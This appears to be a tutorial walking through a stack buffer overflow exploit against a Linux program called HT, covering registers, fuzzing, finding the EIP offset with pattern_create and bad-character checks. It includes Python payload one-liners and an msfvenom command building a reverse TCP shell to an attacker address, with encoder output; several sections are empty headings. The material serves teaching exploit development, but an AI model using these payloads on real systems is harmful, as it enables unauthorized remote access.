What is a buffer overflow?
A buffer overflow occurs when a program receives more input than the buffer set aside for it can hold and has not been coded to handle the excess gracefully. The extra input spills into adjacent memory locations and overwrites them. A properly coded program should check the length of its input and reject or truncate anything too long, so that no memory corruption can occur.
The example below shows what happens when a buffer overflow occurs.
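As a rough illustration of the idea, here is a minimal Python 3 sketch that simulates memory as a flat byte array. The 8-byte buffer size, the "SAFE" marker standing in for adjacent data, and the function names are all made up for this example. Real overflows happen in languages such as C that do not check bounds, so this is only a model of the behaviour.

```python
BUF_SIZE = 8  # hypothetical buffer size chosen for this illustration


def make_memory():
    """An 8-byte buffer followed by 4 bytes standing in for adjacent data."""
    return bytearray(b"\x00" * BUF_SIZE + b"SAFE")


def unchecked_copy(memory, data):
    """Copy with no length check, the way a careless C routine would."""
    for i, byte in enumerate(data[:len(memory)]):
        memory[i] = byte
    return memory


def checked_copy(memory, data):
    """Refuse input that does not fit in the buffer."""
    if len(data) > BUF_SIZE:
        raise ValueError("input longer than buffer")
    memory[:len(data)] = data
    return memory


# Twelve bytes of input against an 8-byte buffer: the last four bytes
# overwrite the adjacent "SAFE" marker.
overflowed = unchecked_copy(make_memory(), b"U" * 8 + b"AAAA")
print(bytes(overflowed[BUF_SIZE:]))
```

The checked version raises an error for the same input, which is the graceful handling described above.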
CPU Registers and Memory pointers
When a program starts, it is loaded from the hard disk into memory, where it can be read from and written to much faster than on the hard drive. The CPU keeps track of its position in the code with an instruction pointer: it fetches the instruction the pointer refers to, executes it, and then moves on to the next one.
Programs jump around, store values (variables) and reuse segments of code. Variables are stored in memory locations, and the CPU registers keep track of those locations and of the jump points, so that while the program is running, execution is sent to the correct locations in memory.
For buffer overflows, the three CPU registers that matter most are EIP, EBP and ESP.
EIP: Extended Instruction Pointer. This points to the next instruction in memory that the CPU will execute.
ESP: Extended Stack Pointer. This points to the top of the stack.
EBP: Extended Base Pointer. This points to the base (bottom) of the current stack frame.
Why is this bad?
Walkthrough of a Buffer Overflow
Testing for Buffer Overflow aka: Fuzzing
Confirming EIP was overwritten
Now that we have overwritten EIP, we need to find exactly which of our bytes ended up in it. We know that it happened somewhere between 4000 and 4200 bytes. The easiest way to find out is to generate a string of 4200 bytes in which every short sequence is unique, send it, check which bytes landed in EIP, and then locate those bytes in the string. Their position tells us the exact offset at which our input reaches EIP.
Metasploit comes with a pattern creation tool, pattern_create.rb, for exactly this purpose. Run the tool with the -l switch followed by the number of unique bytes to generate, in our case 4200.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4200
Instead of sending 4200 ‘U’ characters into the program, we now send this unique string.
run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5…<SNIP>…Bn6Bn7Bn8Bn9'")
EIP has now been overwritten by 4 unique bytes that we can copy and use to find the exact location in our 4200 unique string.
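To make the lookup step concrete, here is a small Python 3 sketch of how such a pattern can be generated and searched. It assumes the same upper/lower/digit scheme as the string shown above. It is not Metasploit's implementation, and the function names simply mirror the tool names for readability. Because x86 is little-endian, the value a debugger shows in EIP has to be converted back into byte order before searching.

```python
import string


def pattern_create(length):
    """Build an 'Aa0Aa1Aa2...' style pattern, cut to `length` characters.

    The scheme yields at most 26 * 26 * 10 * 3 = 20280 characters.
    """
    chunks = []
    produced = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                if produced >= length:
                    return "".join(chunks)[:length]
                chunks.append(upper + lower + digit)
                produced += 3
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length):
    """Return the offset of the 4 bytes seen in EIP, or -1 if not found.

    `eip_value` is the register value as an integer; it is turned back
    into memory byte order (little-endian) before searching.
    """
    needle = eip_value.to_bytes(4, "little").decode("latin-1")
    return pattern_create(length).find(needle)


# Simulation only: pretend the 4 bytes at offset 4091 ended up in EIP.
pattern = pattern_create(4200)
simulated_eip = int.from_bytes(pattern[4091:4095].encode("latin-1"), "little")
print(pattern_offset(simulated_eip, 4200))
```

In a real session the EIP value would come from the debugger after the crash, not from slicing the pattern as this simulation does.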
Before creating our malicious shellcode, we must first confirm that we control EIP. Instead of sending 4200 ‘U’ characters and causing a crash, we will send 4091 U’s followed by 4 A’s. This should result in the memory before EIP being overwritten by 55 (the hex value for U) and EIP being overwritten by exactly four 41s (the hex value for A). The total length of our buffer including EIP is 4095 bytes (4091 for the offset plus 4 for EIP).
run $(python -c 'print "\x55" * (4095 - 4) + "\x41" * 4')
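The arithmetic behind that command can be checked with a short Python 3 sketch. The constant and function names here are illustrative only. Note that the one-liner above uses Python 2 print syntax; the sketch below works with bytes objects instead.

```python
OFFSET = 4091    # bytes needed to reach EIP, as found above
EIP_LEN = 4      # EIP is a 32-bit register


def build_test_payload(offset=OFFSET):
    """Filler of 'U' (0x55) up to the offset, then 'AAAA' (0x41) for EIP."""
    return b"\x55" * offset + b"\x41" * EIP_LEN


payload = build_test_payload()
print(len(payload))
```

If the offset is right, the debugger should show EIP holding 41414141 after the crash, with 55s in the memory before it.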
Before creating final shellcode
Before creating shellcode, there are a few cleanup tasks to do so that our code executes reliably. The first is to make sure there is enough room to fit our code within the buffer: it must be shorter than 4091 bytes. We also need to pad our code to leave empty space between ESP (the top of the stack) and the start of our code. The first reason for leaving this space is the technique we are going to use, which will be explained later. The second is that the stack can shift and “wobble” as other functions run and push and pop values.
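The space budget can be sketched in Python 3 as follows. Several things here are assumptions rather than anything established above: the layout order (padding, then shellcode, then filler, then the 4 bytes for EIP), the use of the x86 NOP byte 0x90 as padding, the 16-byte padding length, and the function name. Treat it as one possible arrangement for checking sizes, not as the final exploit layout.

```python
OFFSET = 4091  # bytes available before EIP


def build_buffer(shellcode, pad_len, eip, offset=OFFSET, pad_byte=b"\x90"):
    """Lay out padding + shellcode + filler + EIP (assumed order).

    Raises ValueError if the padding and shellcode do not fit before EIP.
    """
    if len(eip) != 4:
        raise ValueError("EIP value must be exactly 4 bytes")
    filler_len = offset - pad_len - len(shellcode)
    if filler_len < 0:
        raise ValueError("padding plus shellcode exceed the space before EIP")
    return pad_byte * pad_len + shellcode + b"\x55" * filler_len + eip


# Placeholder bytes stand in for real shellcode; only the length matters here.
placeholder = b"\xcc" * 95
buffer = build_buffer(placeholder, pad_len=16, eip=b"\x66" * 4)
print(len(buffer))
```

Whatever layout is used, the total must stay at 4095 bytes so that the last four bytes still land in EIP.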
Get the size of shellcode
To create our shellcode I will be using another of Metasploit's tools, msfvenom. Msfvenom makes it extremely easy to whip up simple backdoors and reverse shells. The payload I will be using here is a standard TCP reverse shell, output as C shellcode:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.240 LPORT=6000 --platform linux --arch x86 --format c
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf =
Identify and remove bad characters
The second cleanup task is identifying any bad characters in our shellcode that could be interpreted by the program and cause our exploit to fail. For example, the newline character is 0x0a in hex. If our shellcode contains a 0x0a byte, the program may treat it as the end of a line, cut our input off at that point, and the code will not run. We do not know how the HT program we are exploiting was written or which characters it treats specially, so to find the bad characters we need to submit the entire hex table to the HT program and examine it in memory, noting any characters that are missing or altered. Those are the “bad chars”.
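The comparison step can be sketched in Python 3 as below. The function names are hypothetical, and excluding 0x00 from the start is an assumption (null bytes commonly terminate strings). The "observed" bytes would in practice be copied out of a debugger memory dump; here they are simulated.

```python
def candidate_bytes(exclude=b"\x00"):
    """Every byte value from 0x00 to 0xff except those already known bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, observed):
    """Return the first sent byte that is missing or altered in memory.

    Returns None when everything that was sent arrived intact.
    """
    for i, byte in enumerate(sent):
        if i >= len(observed) or observed[i] != byte:
            return byte
    return None


# Simulation only: pretend the program cut the input off at the newline.
sent = candidate_bytes()
observed = sent[:sent.index(0x0A)]
bad = first_bad_char(sent, observed)
print(hex(bad))
```

Each bad character found this way is added to the exclude list and the test repeated, since one bad character can hide others that come after it.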
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf =
EIP = "\x66" * 4